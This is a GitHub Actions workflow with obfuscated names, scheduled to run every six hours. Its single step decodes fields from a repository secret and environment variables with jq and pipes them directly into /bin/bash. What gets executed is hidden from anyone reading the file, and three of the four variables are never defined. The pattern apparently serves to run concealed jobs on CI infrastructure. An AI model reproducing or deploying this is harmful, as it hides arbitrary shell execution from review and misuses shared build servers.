name: guzhengqiu3817

on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guzhengqiu3817
        env:
          e243: ${{ secrets.e243 }}
        run: |
          echo $e243 | jq -r .otp95 | /bin/bash
          echo $j649 | jq -r .p664 | /bin/bash
          echo $b399 | jq -r .no481 | /bin/bash
          echo $gsoup46 | jq -r .bgtg9986 | /bin/bash

